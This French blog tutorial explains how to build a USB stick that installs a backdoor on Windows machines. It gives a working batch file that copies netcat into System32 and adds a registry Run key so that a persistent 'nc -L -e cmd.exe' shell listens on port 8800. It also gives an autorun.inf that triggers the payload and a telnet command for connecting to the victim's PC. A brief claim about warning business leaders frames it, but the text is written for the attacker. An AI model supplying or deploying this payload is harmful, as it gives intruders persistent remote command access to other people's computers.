Injecter un backdoor avec une clé USB

clé USB

 

Injecter un backdoor dans une machine Windows

avec une clé USB


 

Source


 


 

Dans les articles précédents nous avons vu comment  créer une clé USB qui récupère les mots de passe d’un ordinateur. Aujourd’hui  nous allons voir comment créer une  clé USB qui ouvre un backdoor sur un ordinateur Windows.

Ce rootkit s’exécute automatiquement, crée un backdoor  sur un PC Windows et vous permet d’accéder a l’ordinateur de la victime à distance depuis n’importe quelle machine.

Comme d’habitude l’objectif ce tutoriel,  c’est de montrer aux dirigeants d’entreprises à quel point l’utilisation des clés USB peut être dangereux. Ce qui est valable pour les entreprises ne l’est pas moins pour les simples particuliers.

Pour créer notre clé USB backdoor, il faut suivre les étapes ci-dessus:

 

Étape 1

Premièrement, nous allons créer un dossier sur notre clé USB ensuite nous allons télécharger Netcat, un utilitaire permettant d’ouvrir des connexions réseau, que ce soit UDP ou TCP. Vous pouvez aussi utiliser cryptcat, le clone de netcat, à la seule condition que ce dernier chiffre ses communications.

Télécharger Netcat pour windows 

Apres le téléchargement de Netcat, on le dézippe dans le dossier crée.

Etape 2
Ensuite nous allons créer un fichier backdoor.bat. Ce dernier va faire deux trucs:

  • Copier les fichiers du Netcat dans le dossier System32 de l’ordinateur cible
  • Ajouter une valeur chaîne dans le registre du PC victime pour que notre Backdoor se lance à chaque démarrage.

Pour cela, créez un nouveau document texte avec bloc note ou autres et écrire le code ci-dessous:

copy *.* « %SYSTEMROOT%/System32 »
REG ADD « HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun » /v « backdoor »  /t « REG_SZ » /d « %SYSTEMROOT%System32nc.exe -d -L -e cmd.exe -p 8800 »

Etape 3
Maintenant il vous reste de créer le fichier autorun.inf
Dans cette étape nous allons créer une nouvelle option dans la fenêtre qui apparaît à l’insertion d’une USB, qui nous permettra (une fois cliquez dessus) notre backdoor s’installe sur l’ordinateur cible.

Pour réalisez ceci,  ouvrez un nouveau document texte puis on insère ce code :

[autorun]

open=backdoor.bat

ACTION= »donner un nom à cette action »

Enfin on enregistre le fichier sous la racine de la clé sous le nom autorun.inf

Après l’insertion du clé USB, vous pouvez à partir de n’importe quelle machine vous connecter sur le poste de la victime avec la commande suivante:

telnet 192.168.1.17 8800
192.168.1.17 désigne l’adresse IP de la machine distant qui vous faut remplacer. Et 8800 c’est le port utiliser pr se connecter.

Et voilà ! Vou pouvez faire ce qui vous chante : ouvrir des fichiers, lancer une recherche, exécuter un programme…

Pour vous déconnecter, tapez « logout » .

Faites-en bon usage.

 

No ratings yet - be the first to rate this.

إضافة تعليق

You're using an AdBlock like software. Disable it to allow submit.